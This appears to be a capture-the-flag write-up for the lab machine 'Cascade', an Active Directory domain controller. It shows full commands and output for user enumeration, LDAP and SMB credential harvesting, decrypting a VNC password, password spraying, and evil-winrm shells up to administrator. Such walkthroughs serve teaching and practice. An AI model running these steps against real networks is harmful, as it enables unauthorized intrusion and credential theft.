Cascade
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.182 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Apr 3 09:30:08 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.053s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49170/tcp open unknown
# Nmap done at Mon Apr 3 09:30:34 2023 -- 1 IP address (1 host up) scanned in 26.48 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Apr 3 09:32:04 2023 as: nmap -sCV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 -Pn -n -oN targeted 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-03 07:32:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-04-03T07:33:05
|_ start_date: 2023-04-03T07:28:59
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 3 09:33:41 2023 -- 1 IP address (1 host up) scanned in 96.79 secondsThe machine is probably a domain controller, and as seen with crackmapexec, the domain name is cascade.local.
crackmapexec smb 10.10.10.182
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)Let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.182 cascade.localWe could try to get a list of users using rpcclient.
rpcclient -N -U '' 10.10.10.182 -c "enumdomusers" | grep -oP '[.*]' | awk '{print $1}' | tr -d "[]" > users
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croftExploitation
As port 389 is open, let's enumerate the DC via the LDAP service.
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)'
...
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20230403090010.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 340120
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133249860104354812
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
...The r.thompson user has one attribute called cascadeLegacyPwd with one encoded password.
echo 'clk0bjVldmE=' | base64 -d; echo
rY4n5evaNow we could try to enumerate SMB shares with these credentials.
crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server shareWe can read the Data share. Let's mount it to our local system.
mkdir /mnt/Data
mount -t cifs //10.10.10.182/Data /mnt/Data/ -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw
The Data share has a few files.
tree -fas /mnt/Data
[ 4096] /mnt/Data
├── [ 0] /mnt/Data/Contractors
├── [ 0] /mnt/Data/Finance
├── [ 0] /mnt/Data/IT
│ ├── [ 0] /mnt/Data/IT/Email Archives
│ │ └── [ 2522] /mnt/Data/IT/Email Archives/Meeting_Notes_June_2018.html
│ ├── [ 0] /mnt/Data/IT/LogonAudit
│ ├── [ 0] /mnt/Data/IT/Logs
│ │ ├── [ 0] /mnt/Data/IT/Logs/Ark AD Recycle Bin
│ │ │ └── [ 1303] /mnt/Data/IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
│ │ └── [ 0] /mnt/Data/IT/Logs/DCs
│ │ └── [ 5967] /mnt/Data/IT/Logs/DCs/dcdiag.log
│ └── [ 0] /mnt/Data/IT/Temp
│ ├── [ 0] /mnt/Data/IT/Temp/r.thompson
│ └── [ 0] /mnt/Data/IT/Temp/s.smith
│ └── [ 2680] /mnt/Data/IT/Temp/s.smith/VNC Install.reg
├── [ 0] /mnt/Data/Production
└── [ 0] /mnt/Data/Temps
14 directories, 4 filesThe most interesting ones are the Meeting_Notes_June_2018.html which says that the TempUser user had the same password as the administrator.
cat /mnt/Data/IT/Email\ Archives/Meeting_Notes_June_2018.html
<html>
...
<p>For anyone that missed yesterday�s meeting (I�m looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the �Best GPO� competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
...py
</html>And the VNC Install.reg file which seems to have a hexadecimal encoded password for the user.
cat /mnt/Data/IT/Temp/s.smith/VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...As it seems to be a VNC encrypted password, we can decrypt it with the following command I found here.
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008We have a password, but we don't know whose user it is. Let's password-spray it across all the users we found earlier.
crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2'
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2The password is valid for the s.smith user, which seems to be a member of the Remote Management Users group because we can get a shell with evil-winrm and take the user flag.
evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> type \users\s.smith\desktop\user.txt
5c9642f15b39fb3be3360bf930421fbePrivilege Escalation
He has access to one more share from the SMB server called Audit$.
crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2' --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$ READ
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share Let's mount it to our local system.
mkdir /mnt/Audit$
mount -t cifs //10.10.10.182/Audit$ /mnt/Audit$/ -o username=s.smith,password=sT333ve2,domain=cascade.local,rw
The share has what seems to be the files needed for the CascAudit.exe binary to work properly.
tree -fas /mnt/Audit$/
[ 4096] /mnt/Audit$
├── [ 13312] /mnt/Audit$/CascAudit.exe
├── [ 12288] /mnt/Audit$/CascCrypto.dll
├── [ 0] /mnt/Audit$/DB
│ └── [ 24576] /mnt/Audit$/DB/Audit.db
├── [ 45] /mnt/Audit$/RunAudit.bat
├── [ 363520] /mnt/Audit$/System.Data.SQLite.dll
├── [ 186880] /mnt/Audit$/System.Data.SQLite.EF6.dll
├── [ 0] /mnt/Audit$/x64
│ └── [ 1639936] /mnt/Audit$/x64/SQLite.Interop.dll
└── [ 0] /mnt/Audit$/x86
└── [ 1246720] /mnt/Audit$/x86/SQLite.Interop.dll
4 directories, 8 filesThere is one .db file, which works with SQLite 3.
file /mnt/Audit$/DB/Audit.db
/mnt/Audit$/DB/Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60The database has three tables, and the Ldap table has one bas64 encoded password for the ArkSvc user.
sqlite3 /mnt/Audit$/DB/Audit.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>But the password seems to be encrypted.
echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d; echo
������D�|zC�;Let's reverse engineer the CascAudit.exe binary with dotPeek to its source code and see what it is doing. Transfer CascAudit.exe and CascCrypto.dll to a Windows machine with dotPeek installed, and open both files with it.
The CascAudit.exe source code has a key that seems to be used to encrypt and decrypt passwords.
On the other hand, the CascCtypto.dll source code shows that it encrypts the passwords using AES CDC, with a specified IV key.
We can use online tools such as devglan.com to decrypt the encrypted password we found in the database using the IV key and the secret key.
Let's use these credentials to get a shell as arksvc.
evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvcAs we can see, the arksvc user is a member of the AD Recycle Bin group, which means that it has permission to read deleted AD objects.
net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/3/2023 11:05:50 AM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.Let's check deleted AD objects with the following command. There is one base64 encoded password for the TempAdmin user.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
...
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
...Decode the base64 string to get the password.
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d; echo
baCT3r1aN00dlesIf you remember, there was a note in the Data share that said the password of the TempAdmin user was the same one as the administrator user. So we can get a shell as administrator, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
cfea48b584bf5e41dd25ec34603707c1Last updated
Was this helpful?